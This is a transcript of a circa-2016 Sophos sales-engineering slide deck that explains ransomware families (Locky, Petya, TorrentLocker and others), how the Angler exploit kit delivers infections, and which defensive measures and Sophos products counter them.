Sophos SafeGuard Disk Encryption, Sophos SafeGuard Easy, Startup guide
Sophos Become an IT hero...2 main vectors of attack • SPAM (via social engineering) ○ Seemingly...
Transcript of Sophos Become an IT hero...2 main vectors of attack • SPAM (via social engineering) ○ Seemingly...
![Page 1: Sophos Become an IT hero...2 main vectors of attack • SPAM (via social engineering) ○ Seemingly plausible sender ○ Has attachment e.g. invoice, parcel delivery note ○ The attachment](https://reader035.fdocuments.net/reader035/viewer/2022071216/6047a436d01d8b5358334f83/html5/thumbnails/1.jpg)
Sophos – Become an IT hero
Dean Shroll – Director Sales Engineering
Arnie Rice – Enterprise Sales Engineer, TOLA
![Page 2: Sophos Become an IT hero...2 main vectors of attack • SPAM (via social engineering) ○ Seemingly plausible sender ○ Has attachment e.g. invoice, parcel delivery note ○ The attachment](https://reader035.fdocuments.net/reader035/viewer/2022071216/6047a436d01d8b5358334f83/html5/thumbnails/2.jpg)
Sophos Snapshot
1985FOUNDEDOXFORD, UK
534.9IN BILLINGS(FY16)
2,700EMPLOYEES(APPX.)
200,000+CUSTOMERS
100M+USERS
HQABINGDON, UK
90+%BEST IN CLASSRENEWAL RATES
20,000+CHANNEL PARTNERS
OEM PARTNERS:
KEY DEVCENTERS
OFFICES
![Page 3: Sophos Become an IT hero...2 main vectors of attack • SPAM (via social engineering) ○ Seemingly plausible sender ○ Has attachment e.g. invoice, parcel delivery note ○ The attachment](https://reader035.fdocuments.net/reader035/viewer/2022071216/6047a436d01d8b5358334f83/html5/thumbnails/3.jpg)
Mission
To be the best in the world at delivering
complete IT security to mid-market enterprises
and the channel that serves them
Strategy
Security only
Focus on mid-market enterprises
Complete security – Made simple
Integrated Next Gen endpoint and network security
Managed and delivered through the cloud
‘Channel First’ sales model
![Page 4: Sophos Become an IT hero...2 main vectors of attack • SPAM (via social engineering) ○ Seemingly plausible sender ○ Has attachment e.g. invoice, parcel delivery note ○ The attachment](https://reader035.fdocuments.net/reader035/viewer/2022071216/6047a436d01d8b5358334f83/html5/thumbnails/4.jpg)
Threat Landscape 2016
![Page 5: Sophos Become an IT hero...2 main vectors of attack • SPAM (via social engineering) ○ Seemingly plausible sender ○ Has attachment e.g. invoice, parcel delivery note ○ The attachment](https://reader035.fdocuments.net/reader035/viewer/2022071216/6047a436d01d8b5358334f83/html5/thumbnails/5.jpg)
400,000 new malware per day
>6800 vulnerabilities per year
>90% of data breaches use
exploits
~24
Traditional Anti-Virus• File Analytics
• Heuristics
• URL Blocking
• Black/White Lists• Signatures• Sandboxing
Data Breaches - The root of the problem
Patch Management• Vulnerability Scanning
• Device Management
• Patch testing and deployment
SIEM and EDR• Anomaly Detection
• Security Operations Center
• Forensic breach assessment teams
Sophos - Intercept• Exploit and Ransomware Prevention
• Incident Response Report
• Root Cause determination
Available Exploit Methods
>70% of companies have been breached
>30% increase from 2015
![Page 6: Sophos Become an IT hero...2 main vectors of attack • SPAM (via social engineering) ○ Seemingly plausible sender ○ Has attachment e.g. invoice, parcel delivery note ○ The attachment](https://reader035.fdocuments.net/reader035/viewer/2022071216/6047a436d01d8b5358334f83/html5/thumbnails/6.jpg)
6
80% 10% 5%
Exposure Prevention
URL BlockingWeb Scripts
Download Rep
Pre-Exec Analytics
Generic MatchingHeuristicsCore Rules
Signatures
Known MalwareMalware Bits
3% 2%
Run-Time
Behavior Analytics
Runtime Behavior
Exploit Detection
Technique Identification
Traditional Malware Advanced Threats
Where Malware Gets StoppedNote: Each Model Standalone is 80-95% Effective
}
This 5% is the SCARY stuff
![Page 7: Sophos Become an IT hero...2 main vectors of attack • SPAM (via social engineering) ○ Seemingly plausible sender ○ Has attachment e.g. invoice, parcel delivery note ○ The attachment](https://reader035.fdocuments.net/reader035/viewer/2022071216/6047a436d01d8b5358334f83/html5/thumbnails/7.jpg)
THIRD PARTY
Malvertising Threat Chain
AD NETWORK
RTB
![Page 8: Sophos Become an IT hero...2 main vectors of attack • SPAM (via social engineering) ○ Seemingly plausible sender ○ Has attachment e.g. invoice, parcel delivery note ○ The attachment](https://reader035.fdocuments.net/reader035/viewer/2022071216/6047a436d01d8b5358334f83/html5/thumbnails/8.jpg)
Ransomware today
![Page 9: Sophos Become an IT hero...2 main vectors of attack • SPAM (via social engineering) ○ Seemingly plausible sender ○ Has attachment e.g. invoice, parcel delivery note ○ The attachment](https://reader035.fdocuments.net/reader035/viewer/2022071216/6047a436d01d8b5358334f83/html5/thumbnails/9.jpg)
![Page 10: Sophos Become an IT hero...2 main vectors of attack • SPAM (via social engineering) ○ Seemingly plausible sender ○ Has attachment e.g. invoice, parcel delivery note ○ The attachment](https://reader035.fdocuments.net/reader035/viewer/2022071216/6047a436d01d8b5358334f83/html5/thumbnails/10.jpg)
What is Ransomware?
• There are different types of ransomware. However, all of them will prevent you from using your PC normally, and they will all ask you to do something before you can use your PC.
• Microsoft
Ransomware can: Prevent access Encrypt files Stop certain applications from running
Ransomware normally demands a payment (ransom) in order to restore normal operation.
![Page 11: Sophos Become an IT hero...2 main vectors of attack • SPAM (via social engineering) ○ Seemingly plausible sender ○ Has attachment e.g. invoice, parcel delivery note ○ The attachment](https://reader035.fdocuments.net/reader035/viewer/2022071216/6047a436d01d8b5358334f83/html5/thumbnails/11.jpg)
2 main vectors of attack
• SPAM (via social engineering)○ Seemingly plausible sender
○ Has attachment e.g. invoice, parcel delivery note
○ The attachment contains an embedded macro
○ When the attachment is opened the macro downloads and then executes the ransomware payload
○ Used by Locky, TorrentLocker, CTB-Locker
• Exploit kits○ Black market tools used to easily create attacks that
exploit known or unknown vulnerabilities (zero-day)
○ Client side vulnerabilities usually target the Web browser
○ Angler, Neutrino
![Page 12: Sophos Become an IT hero...2 main vectors of attack • SPAM (via social engineering) ○ Seemingly plausible sender ○ Has attachment e.g. invoice, parcel delivery note ○ The attachment](https://reader035.fdocuments.net/reader035/viewer/2022071216/6047a436d01d8b5358334f83/html5/thumbnails/12.jpg)
Many ways to fool/interest you
![Page 13: Sophos Become an IT hero...2 main vectors of attack • SPAM (via social engineering) ○ Seemingly plausible sender ○ Has attachment e.g. invoice, parcel delivery note ○ The attachment](https://reader035.fdocuments.net/reader035/viewer/2022071216/6047a436d01d8b5358334f83/html5/thumbnails/13.jpg)
Exploit Kits
![Page 14: Sophos Become an IT hero...2 main vectors of attack • SPAM (via social engineering) ○ Seemingly plausible sender ○ Has attachment e.g. invoice, parcel delivery note ○ The attachment](https://reader035.fdocuments.net/reader035/viewer/2022071216/6047a436d01d8b5358334f83/html5/thumbnails/14.jpg)
What is an Exploit Kit?
… software kit designed to run on web servers, with the purpose of identifying software vulnerabilities in client machines communicating with it, and discovering and exploiting vulnerabilities to upload and execute malicious code on the client…
…tend to be deployed covertly on legitimate Web sites that have been hacked, unknown to the site operators and visitors.
![Page 15: Sophos Become an IT hero...2 main vectors of attack • SPAM (via social engineering) ○ Seemingly plausible sender ○ Has attachment e.g. invoice, parcel delivery note ○ The attachment](https://reader035.fdocuments.net/reader035/viewer/2022071216/6047a436d01d8b5358334f83/html5/thumbnails/15.jpg)
Exploits As a Service
Initial Request
Victims
Exploit Kit Customers Redirection
MaliciousPayloads
Stats
Landing Page
Tor
Exploit Kit Admin
Exploits
Payloads
Get Current Domain
Get Stats
Update payloads
Management Panel Malware DistributionServers
Gateway Servers
![Page 16: Sophos Become an IT hero...2 main vectors of attack • SPAM (via social engineering) ○ Seemingly plausible sender ○ Has attachment e.g. invoice, parcel delivery note ○ The attachment](https://reader035.fdocuments.net/reader035/viewer/2022071216/6047a436d01d8b5358334f83/html5/thumbnails/16.jpg)
Angler: an all-too-well-known exploit kit
• Grown in notoriety since mid 2014
o The payload is stored in memory and the disk file is deleted
o Detects security products and virtual machines
o Ability to spread many infections: banking Trojans, backdoor, rootkits, ransomware
• Easy to useo Doesn’t require any particular
technical competence
o Available for a few thousand USD on the Dark Web
![Page 17: Sophos Become an IT hero...2 main vectors of attack • SPAM (via social engineering) ○ Seemingly plausible sender ○ Has attachment e.g. invoice, parcel delivery note ○ The attachment](https://reader035.fdocuments.net/reader035/viewer/2022071216/6047a436d01d8b5358334f83/html5/thumbnails/17.jpg)
Chain of infection for Angler exploit kits
1. The victim accesses a compromised web server through a vulnerable browser
2. The compromised web server redirects the connection to an intermediary server
3. In turn, the intermediary server redirects the connection to the attacker’s server which hosts the destination page of the exploit kit
4. The destination page looks for vulnerable plug-ins (Java, Flash, Silverlight) and their version numbers
5. If a vulnerable browser or plug in is detected the exploit kit releases its payload and infects the system.
![Page 18: Sophos Become an IT hero...2 main vectors of attack • SPAM (via social engineering) ○ Seemingly plausible sender ○ Has attachment e.g. invoice, parcel delivery note ○ The attachment](https://reader035.fdocuments.net/reader035/viewer/2022071216/6047a436d01d8b5358334f83/html5/thumbnails/18.jpg)
Is Angler Dead?
1. 2016-06-07T05:29:46Z, when our last hit for Angler was recorded.
2. Started to dip in January 2016 but went back up in February.
3. Russia’s Federal Security Service (FSB) arrested 50 tied to $50M via Lurk malware.
4. Neutrino filling the void?
![Page 19: Sophos Become an IT hero...2 main vectors of attack • SPAM (via social engineering) ○ Seemingly plausible sender ○ Has attachment e.g. invoice, parcel delivery note ○ The attachment](https://reader035.fdocuments.net/reader035/viewer/2022071216/6047a436d01d8b5358334f83/html5/thumbnails/19.jpg)
Anatomy of a ransomware attack
![Page 20: Sophos Become an IT hero...2 main vectors of attack • SPAM (via social engineering) ○ Seemingly plausible sender ○ Has attachment e.g. invoice, parcel delivery note ○ The attachment](https://reader035.fdocuments.net/reader035/viewer/2022071216/6047a436d01d8b5358334f83/html5/thumbnails/20.jpg)
Ransomware
![Page 21: Sophos Become an IT hero...2 main vectors of attack • SPAM (via social engineering) ○ Seemingly plausible sender ○ Has attachment e.g. invoice, parcel delivery note ○ The attachment](https://reader035.fdocuments.net/reader035/viewer/2022071216/6047a436d01d8b5358334f83/html5/thumbnails/21.jpg)
Ransomware Evolves
![Page 22: Sophos Become an IT hero...2 main vectors of attack • SPAM (via social engineering) ○ Seemingly plausible sender ○ Has attachment e.g. invoice, parcel delivery note ○ The attachment](https://reader035.fdocuments.net/reader035/viewer/2022071216/6047a436d01d8b5358334f83/html5/thumbnails/22.jpg)
Anatomy of a ransomware attack
And gone
The ransomware will then delete itself leaving just the encrypted files and ransom notes behind.
Ransom demand
A message appears on the user’s desktop, explaining how a ransom (often in the form of bitcoins) can be paid within a time frame of e.g. 72 hours to enable decryption of the data with the private key that only the attacker’s system has access to.
Encryption of assets
Certain files are then encrypted on the local computer and on all accessible network drives with this public key. Automatic backups of the Windows OS (shadow copies) are often deleted to prevent data recovery.
Contact with the command & control server of the attacker
The ransomware sends information about the infected computer to the C&C server and downloads an individual public key for this computer.
Installation via an exploit kit or spam with an infected attachment
Once installed the ransomware modifies the registry keys
![Page 23: Sophos Become an IT hero...2 main vectors of attack • SPAM (via social engineering) ○ Seemingly plausible sender ○ Has attachment e.g. invoice, parcel delivery note ○ The attachment](https://reader035.fdocuments.net/reader035/viewer/2022071216/6047a436d01d8b5358334f83/html5/thumbnails/23.jpg)
Ransom demands
![Page 24: Sophos Become an IT hero...2 main vectors of attack • SPAM (via social engineering) ○ Seemingly plausible sender ○ Has attachment e.g. invoice, parcel delivery note ○ The attachment](https://reader035.fdocuments.net/reader035/viewer/2022071216/6047a436d01d8b5358334f83/html5/thumbnails/24.jpg)
Paying ransoms
• Payment is made in Bitcoins
• Instructions are available via Tor
• The ransom increases the longer you take to pay
• On payment of the ransom, the public encryption key is provided so you can decrypt your computer files
![Page 25: Sophos Become an IT hero...2 main vectors of attack • SPAM (via social engineering) ○ Seemingly plausible sender ○ Has attachment e.g. invoice, parcel delivery note ○ The attachment](https://reader035.fdocuments.net/reader035/viewer/2022071216/6047a436d01d8b5358334f83/html5/thumbnails/25.jpg)
Common ransomware:
![Page 26: Sophos Become an IT hero...2 main vectors of attack • SPAM (via social engineering) ○ Seemingly plausible sender ○ Has attachment e.g. invoice, parcel delivery note ○ The attachment](https://reader035.fdocuments.net/reader035/viewer/2022071216/6047a436d01d8b5358334f83/html5/thumbnails/26.jpg)
26
![Page 27: Sophos Become an IT hero...2 main vectors of attack • SPAM (via social engineering) ○ Seemingly plausible sender ○ Has attachment e.g. invoice, parcel delivery note ○ The attachment](https://reader035.fdocuments.net/reader035/viewer/2022071216/6047a436d01d8b5358334f83/html5/thumbnails/27.jpg)
Locky:
• Nickname of a newer strain of ransomware, so-called because it renames all your important files so that they have the extension .locky
• Ransoms vary from BTC 0.5 to BTC 1.00 (1 BTC is worth about $635 as of 10/13/16).
• Started hitting the headlines in early 2016
• Wreaking havoc with at least 400,000 machines affected worldwide
![Page 28: Sophos Become an IT hero...2 main vectors of attack • SPAM (via social engineering) ○ Seemingly plausible sender ○ Has attachment e.g. invoice, parcel delivery note ○ The attachment](https://reader035.fdocuments.net/reader035/viewer/2022071216/6047a436d01d8b5358334f83/html5/thumbnails/28.jpg)
A common Locky attack
• You receive an email containing an attached document.
o The document looks like gobbledegook.o The document advises you to enable
macros “if the data encoding is incorrect.”o The criminals want you to click on the
'Options' button at the top of the page.
• Encrypts the wallet.dat (Bitcoin Wallet)
• Once you click Options, Locky will start to execute on your computer.
• As soon as it is ready to ask you for the ransom, it changes your desktop wallpaper.
• The format of the demand varies, but the results are the same.
![Page 29: Sophos Become an IT hero...2 main vectors of attack • SPAM (via social engineering) ○ Seemingly plausible sender ○ Has attachment e.g. invoice, parcel delivery note ○ The attachment](https://reader035.fdocuments.net/reader035/viewer/2022071216/6047a436d01d8b5358334f83/html5/thumbnails/29.jpg)
Odin (Locky’s Brother)
• You receive an email containing an attached document.
o Order Processed Emailo .zip claiming it is you order receipto Unzip see 2 files (cancellation form, Order details)
• Cancellation Form is comprised of a JavaScript (surprise)
o Executes outside browser so bypass Sandboxingo Downloads Odin Ransomware with no popups
• Encrypts files with an AES random generated key.
• Encrypts each AES key with a RSA public key
• Fault tolerant Encryption
• Changes Wallpaper
![Page 30: Sophos Become an IT hero...2 main vectors of attack • SPAM (via social engineering) ○ Seemingly plausible sender ○ Has attachment e.g. invoice, parcel delivery note ○ The attachment](https://reader035.fdocuments.net/reader035/viewer/2022071216/6047a436d01d8b5358334f83/html5/thumbnails/30.jpg)
RAA
• Targeting Businesses for larger payouts
• Composed entirely of JavaScript
○ Masquerade as Word (.doc) files
○ Leverages CyptoJS (open source library)
○ AES Encryption
• Distributed via email attachment.
○ Document appears to be corrupt to end user
○ Meanwhile script scans available drives and uses CryptoJS to encrypt files in the background.
○ Drops copy of Pony.
○ Deletes shadow copies
• Ability to create an Encryption key without the need of the Internet
![Page 31: Sophos Become an IT hero...2 main vectors of attack • SPAM (via social engineering) ○ Seemingly plausible sender ○ Has attachment e.g. invoice, parcel delivery note ○ The attachment](https://reader035.fdocuments.net/reader035/viewer/2022071216/6047a436d01d8b5358334f83/html5/thumbnails/31.jpg)
TorrentLocker
• Almost exclusively distributed via sophisticated spam campaigns
○ High quality emails
○ Translated into multiple languages (Dutch, Japanese, Korean, Italian, Spanish …)
• Highly targeted geographically
• Peculiarity: Use of the victim machine’s address book to send the ransomware to other machines
• Communicates with its C&C server in HTTPS (POST requests) to make detection more difficult
![Page 32: Sophos Become an IT hero...2 main vectors of attack • SPAM (via social engineering) ○ Seemingly plausible sender ○ Has attachment e.g. invoice, parcel delivery note ○ The attachment](https://reader035.fdocuments.net/reader035/viewer/2022071216/6047a436d01d8b5358334f83/html5/thumbnails/32.jpg)
CTB-Locker variant that attacks websites
• Same name as the ransomware that attacks Windows computers
• Written in PHP
• First attack in the UK on 12th February 2016
• Already many hundreds of sites have been attacked
• Attacks websites by encrypting all files in their repositories
• A password-protected ‘shell’ is installed on most of the affected sites, allowing attackers to connect to the server(s) via a backdoor
• ECC encryption local, no Inet connection required to pull a key
![Page 33: Sophos Become an IT hero...2 main vectors of attack • SPAM (via social engineering) ○ Seemingly plausible sender ○ Has attachment e.g. invoice, parcel delivery note ○ The attachment](https://reader035.fdocuments.net/reader035/viewer/2022071216/6047a436d01d8b5358334f83/html5/thumbnails/33.jpg)
Petya
• Latest variant of Ransomware• Ransoms usually BTC 1.00 (1 BTC is worth $594 as of 9.21.16)
• (1 BTC is worth $635 as of 10.13.16)• Started hitting the headlines in early 2016• Majority of infections across the pond, but starting to see it active in the US• Needs admin privileges to complete infection• More targeted attacks, disguised as a email from Human Resources• Encrypts MBR (Master Boot Record) & MFT (Master File Table)• Creates false Blue Screen of death to force reboot
![Page 34: Sophos Become an IT hero...2 main vectors of attack • SPAM (via social engineering) ○ Seemingly plausible sender ○ Has attachment e.g. invoice, parcel delivery note ○ The attachment](https://reader035.fdocuments.net/reader035/viewer/2022071216/6047a436d01d8b5358334f83/html5/thumbnails/34.jpg)
Mischa (now paired with Petya for double the fun)
• In the event Petya fails due to lack of Admin privileges Mischa if Ransomware Fault Tolerance• No admin privileges needed• Started hitting the headlines in Mid 2016• State Side in full affect• Back to file level encryption• Encrypts .exe files as well as normal targets• Very difficult to clean from infected machine• Ransoms Higher than Petya usually BTC 1.75 – 2
(1 BTC is worth $594 as of 9.21.16)(1 BTC is worth $635 as of 10.13.16)
![Page 35: Sophos Become an IT hero...2 main vectors of attack • SPAM (via social engineering) ○ Seemingly plausible sender ○ Has attachment e.g. invoice, parcel delivery note ○ The attachment](https://reader035.fdocuments.net/reader035/viewer/2022071216/6047a436d01d8b5358334f83/html5/thumbnails/35.jpg)
Why these attacks are so successful
![Page 36: Sophos Become an IT hero...2 main vectors of attack • SPAM (via social engineering) ○ Seemingly plausible sender ○ Has attachment e.g. invoice, parcel delivery note ○ The attachment](https://reader035.fdocuments.net/reader035/viewer/2022071216/6047a436d01d8b5358334f83/html5/thumbnails/36.jpg)
Why are these attacks so successful?
Professional attack technology
• Highly professional approach e.g. usually provides the actual decryption key after payment of the ransom
• Skillful social engineering
• Hide malicious code in technologies that are permitted in many companies e.g. Microsoft Office macros, JavaScript, VBScript, Flash …
![Page 37: Sophos Become an IT hero...2 main vectors of attack • SPAM (via social engineering) ○ Seemingly plausible sender ○ Has attachment e.g. invoice, parcel delivery note ○ The attachment](https://reader035.fdocuments.net/reader035/viewer/2022071216/6047a436d01d8b5358334f83/html5/thumbnails/37.jpg)
Why are these attacks so successful?
Security weaknesses in the affected companies
• Inadequate backup strategy
• Updates and patches are not implemented swiftly enough
• Dangerous user/ rights permissions – more than they need
• Lack of user security training
• Security systems are not implemented or used correctly
• Lack of IT security knowledge
• Conflicting priorities: security vs productivity concerns
![Page 38: Sophos Become an IT hero...2 main vectors of attack • SPAM (via social engineering) ○ Seemingly plausible sender ○ Has attachment e.g. invoice, parcel delivery note ○ The attachment](https://reader035.fdocuments.net/reader035/viewer/2022071216/6047a436d01d8b5358334f83/html5/thumbnails/38.jpg)
Why Is It So Challenging to Address New Threats?
Security
6,787 new vulnerabilities in 201531% increase from 2014
IT Ops
80% of breaches are from known vulnerabilities
193 Days on average to fix vulnerabilities after initial
discover
(Source: Gartner)
(Source: WhiteHat Security)
(Source: Forrester)
![Page 39: Sophos Become an IT hero...2 main vectors of attack • SPAM (via social engineering) ○ Seemingly plausible sender ○ Has attachment e.g. invoice, parcel delivery note ○ The attachment](https://reader035.fdocuments.net/reader035/viewer/2022071216/6047a436d01d8b5358334f83/html5/thumbnails/39.jpg)
Practical steps for protection
![Page 40: Sophos Become an IT hero...2 main vectors of attack • SPAM (via social engineering) ○ Seemingly plausible sender ○ Has attachment e.g. invoice, parcel delivery note ○ The attachment](https://reader035.fdocuments.net/reader035/viewer/2022071216/6047a436d01d8b5358334f83/html5/thumbnails/40.jpg)
Security solution requirements
As a minimum you should:
• Patch, Patch, Patch and oh ya PATCH
• Deploy antivirus protection
• Block spam
• Use a sandboxing solution
• Block risky file extensions (javascript, vbscript, chm etc…)
• Password protect archive files
• Use URL filtering (block access to C&C servers)
• Use HTTPS filtering
• Use HIPS (host intrusion prevention service)
• Activate your client firewalls
• Use a whitelisting solution
![Page 41: Sophos Become an IT hero...2 main vectors of attack • SPAM (via social engineering) ○ Seemingly plausible sender ○ Has attachment e.g. invoice, parcel delivery note ○ The attachment](https://reader035.fdocuments.net/reader035/viewer/2022071216/6047a436d01d8b5358334f83/html5/thumbnails/41.jpg)
Additional steps
• Employee awareness & trainingo Sophos IT Security Dos and Don’ts
o Sophos Threatsaurus
• Segment the company networko NAC solutions ensure only known computers can access the network
o Separate functional areas within a firewall e.g. client and server networks
• Encrypt company datao It doesn’t stop the ransomware but prevents damage caused by sensitive
documents getting into the wrong hands
• Use security analysis toolso If an infection does occur, it’s vital that the source is identified and contained
ASAP.
![Page 42: Sophos Become an IT hero...2 main vectors of attack • SPAM (via social engineering) ○ Seemingly plausible sender ○ Has attachment e.g. invoice, parcel delivery note ○ The attachment](https://reader035.fdocuments.net/reader035/viewer/2022071216/6047a436d01d8b5358334f83/html5/thumbnails/42.jpg)
Fighting back: TeslaCrypt
![Page 43: Sophos Become an IT hero...2 main vectors of attack • SPAM (via social engineering) ○ Seemingly plausible sender ○ Has attachment e.g. invoice, parcel delivery note ○ The attachment](https://reader035.fdocuments.net/reader035/viewer/2022071216/6047a436d01d8b5358334f83/html5/thumbnails/43.jpg)
![Page 44: Sophos Become an IT hero...2 main vectors of attack • SPAM (via social engineering) ○ Seemingly plausible sender ○ Has attachment e.g. invoice, parcel delivery note ○ The attachment](https://reader035.fdocuments.net/reader035/viewer/2022071216/6047a436d01d8b5358334f83/html5/thumbnails/44.jpg)
Cryptowall costs users $325M in 2015 –up to $1.1B in 2016
o 2 out of 3 infections driven by phishing attack
o Delivered by drive by exploit kits
o 100’s of thousands of victims world wide
More variants – Locky and Samaso Now for MAC and Windows users
Targeting bigger Phish o $17K payment from California
hospital
Ransomware
CryptoGuard
• Simple and Comprehensive
• Universally prevents spontaneous encryption of data
• Notifies end user on rapid encryption events
• Rollback to pre-encrypted state CRYPTOGUARD
CryptoGuardAvailable NOW
![Page 45: Sophos Become an IT hero...2 main vectors of attack • SPAM (via social engineering) ○ Seemingly plausible sender ○ Has attachment e.g. invoice, parcel delivery note ○ The attachment](https://reader035.fdocuments.net/reader035/viewer/2022071216/6047a436d01d8b5358334f83/html5/thumbnails/45.jpg)
Root Cause Analysis
45
How?
What?
Who?
When?
Why?
Where?
Where did it get in? Should we contact a Regulator?
What damage has been done? Did they steal
important data?
![Page 46: Sophos Become an IT hero...2 main vectors of attack • SPAM (via social engineering) ○ Seemingly plausible sender ○ Has attachment e.g. invoice, parcel delivery note ○ The attachment](https://reader035.fdocuments.net/reader035/viewer/2022071216/6047a436d01d8b5358334f83/html5/thumbnails/46.jpg)
Incident Response – Understanding the activity
Identified Event
Copied from USB device
Fred.pdf created
•Low rep site
•Accessed via acrobat.exe
Fred.com accessed
•Written by iExplore.exe
•From URL fred.com
Bob.exe Created
•Bob.exe reached out to C2 site
•HIPS cleaned Bob.exe
File Infection
Event
TimeRoot Cause Attribution–PDF delivered from USBRecommended Action–Leverage Device Control
Threat Chain –full list of IOCs from the Sophos Data Recorder including process, registry, file, network activityTimeline of events –View the order of operations from Root Cause to detected Malicious activity
•Written by iExplore.exe
•From URL fred.com
Datacollector.exe Created
At Risk Assets –Identification of all productivity documents related to the complete threat chain
Branched Threat Chains – Threat Chain includes suspect activity related to the root cause
![Page 47: Sophos Become an IT hero...2 main vectors of attack • SPAM (via social engineering) ○ Seemingly plausible sender ○ Has attachment e.g. invoice, parcel delivery note ○ The attachment](https://reader035.fdocuments.net/reader035/viewer/2022071216/6047a436d01d8b5358334f83/html5/thumbnails/47.jpg)
Sophos Data Recorder
Operating Systems• Windows
• MAC OS in early 2017
Capacity• Up to 30 days of activity• 100 MB• Local to the device• Under 0.5% CPU
utilization
Understanding the Root Cause of attackFirst – keep a log of what the endpoint has been doing
Memory
Registry
Network
File system
Process activity
![Page 48: Sophos Become an IT hero...2 main vectors of attack • SPAM (via social engineering) ○ Seemingly plausible sender ○ Has attachment e.g. invoice, parcel delivery note ○ The attachment](https://reader035.fdocuments.net/reader035/viewer/2022071216/6047a436d01d8b5358334f83/html5/thumbnails/48.jpg)
Compete protection: Enduser and Network
Sophos CentralEn
du
ser
Net
wo
rk
Next-Gen Firewall /UTM
Web Security
Email Security
Wireless Security
SafeGuardEncryption
Mobile Control
Next-Gen Endpoint Protection
Server Security
Secure the Endpoint (PC/Mac)
Next Gen Endpoint security to prevent, detect, investigate
and remediate
Secure the Mobile DeviceSecure smartphones and tablets just like any other endpoint
Secure the Servers Protection optimized for server
environment (physical or virtual): fast, effective, controlled
Protect the DataSimple-to-use encryption for a
highly effective last line of defense against data loss
Secure the PerimeterUltimate enterprise firewall performance, security, and
control.
Secure the WebAdvanced protection, control, and insights that’s effective,
affordable, and easy.
Secure the EmailEmail threats and phishing
attacks don’t stand a chance.
Secure the WirelessSimple, secure Wi-Fi
connection.
![Page 49: Sophos Become an IT hero...2 main vectors of attack • SPAM (via social engineering) ○ Seemingly plausible sender ○ Has attachment e.g. invoice, parcel delivery note ○ The attachment](https://reader035.fdocuments.net/reader035/viewer/2022071216/6047a436d01d8b5358334f83/html5/thumbnails/49.jpg)
Sophos Sandstorm
How Sophos Sandstorm works
1. If the file has known malware it’s blocked immediately. If it’s otherwise suspicious, and hasn’t been seen before, it will be sent to the sandbox for further analysis. When web browsing, users see a patience message while they wait.
2. The file is detonated in the safe confines of the sandbox and monitored for malicious behaviour. A decision to allow or block the file will be sent to the security solution once the analysis is complete.
3. A detailed report is provided for each file analyzed.
Advanced Threat Defense Made Simple
Secure Web Gateway
Secure Email Gateway
Unified Threat Management
Next-GenFirewall
![Page 50: Sophos Become an IT hero...2 main vectors of attack • SPAM (via social engineering) ○ Seemingly plausible sender ○ Has attachment e.g. invoice, parcel delivery note ○ The attachment](https://reader035.fdocuments.net/reader035/viewer/2022071216/6047a436d01d8b5358334f83/html5/thumbnails/50.jpg)
Security as a System
Synchronized SecurityIntegrated, context-aware security where Enduser and Network technology share meaningful information to deliver better protection
Security must be comprehensiveThe capabilities required to fully satisfy customer need
Security can be made simplePlatform, deployment, licensing, user experience
Security is more effective as a systemNew possibilities through technology cooperation
Next Gen Enduser Security
Next Gen Network Security
Sophos Cloud
heartbeat
SOPHOS LABS
![Page 51: Sophos Become an IT hero...2 main vectors of attack • SPAM (via social engineering) ○ Seemingly plausible sender ○ Has attachment e.g. invoice, parcel delivery note ○ The attachment](https://reader035.fdocuments.net/reader035/viewer/2022071216/6047a436d01d8b5358334f83/html5/thumbnails/51.jpg)
“No other company is close to delivering this type of synchronized and integrated communication between endpoint and
network security products.”
Chris Christiansen, VP of Security Products, IDC
![Page 52: Sophos Become an IT hero...2 main vectors of attack • SPAM (via social engineering) ○ Seemingly plausible sender ○ Has attachment e.g. invoice, parcel delivery note ○ The attachment](https://reader035.fdocuments.net/reader035/viewer/2022071216/6047a436d01d8b5358334f83/html5/thumbnails/52.jpg)
Allows Partners to manage multiple customer installations
Endpoint Protection
Email Security
Web Gateway
Server Protection
Encryption
Mobile Protection
Wireless Allows users to customize security status and notifications
Sophos Central
Partner Dashboard Admin Self Service
![Page 53: Sophos Become an IT hero...2 main vectors of attack • SPAM (via social engineering) ○ Seemingly plausible sender ○ Has attachment e.g. invoice, parcel delivery note ○ The attachment](https://reader035.fdocuments.net/reader035/viewer/2022071216/6047a436d01d8b5358334f83/html5/thumbnails/53.jpg)
Robust Innovation Pipeline for 2016/2017
• Unified Endpoint Management• Security Heartbeat• Sophos Central managed Full EMM• iOS Mobile Security
• Hyper-V protection• AWS Auto-scaling• MTD for Linux, Windows• Security Heartbeat
• Next Gen Endpoint: Exploit Prevention, Anti-Ransomware, Root Cause Analysis
• Sophos Clean• Role-based Administration in Sophos Central
• Sophos UTM 9.5• XG Firewall and Firewall Manager v16• New Synchronized Security Use Cases• New XG Series Appliances
• Global Sophos Central managed SWG• Next-Gen Web Protection • Hybrid On-Prem and Cloud Model • Simplified licensing and pricing
ENDPOINT
MOBILE
SERVER
UTM/NGFW
WEB
• Synchronized Encryption• Sophos Central managed Full Disk Encryption• Multiple Key Support
ENCRYPTION
• Sophos Central managed Wireless• New Sophos Secure Access Points• New XG 1x Series Wireless AppliancesWIRELESS
• Sophos Central managed Sophos Email• Time of Click Protection• New Anti-Spam Engine• New Sophos Email AppliancesEMAIL
![Page 54: Sophos Become an IT hero...2 main vectors of attack • SPAM (via social engineering) ○ Seemingly plausible sender ○ Has attachment e.g. invoice, parcel delivery note ○ The attachment](https://reader035.fdocuments.net/reader035/viewer/2022071216/6047a436d01d8b5358334f83/html5/thumbnails/54.jpg)
This Is Next-Gen IT Security
![Page 55: Sophos Become an IT hero...2 main vectors of attack • SPAM (via social engineering) ○ Seemingly plausible sender ○ Has attachment e.g. invoice, parcel delivery note ○ The attachment](https://reader035.fdocuments.net/reader035/viewer/2022071216/6047a436d01d8b5358334f83/html5/thumbnails/55.jpg)
Melissa Virus
1999
$1.2B
Love LetterWorm
$15B
1998
$2.3B
2007
$800M
2014
LockyRansomware
$1.1B
2016
FinFischerSpyware
2003
$780M
Exploit as aService
$500M
2015
Traditional Malware Advanced Threats
The Evolution of ThreatsFrom Malware to Exploits
![Page 56: Sophos Become an IT hero...2 main vectors of attack • SPAM (via social engineering) ○ Seemingly plausible sender ○ Has attachment e.g. invoice, parcel delivery note ○ The attachment](https://reader035.fdocuments.net/reader035/viewer/2022071216/6047a436d01d8b5358334f83/html5/thumbnails/56.jpg)
Traditional Malware Advanced Threats
The Evolution of SecurityFrom Anti-Malware to Anti-Exploit
Exposure Prevention
URL BlockingWeb/App/Dev
CtrlDownload Rep
Pre-Exec Analytics
Generic MatchingHeuristicsCore Rules
File Scanning
Known MalwareMalware Bits
Run-Time
Behavior Analytics
Runtime Behavior
Exploit Detection
Technique Identification
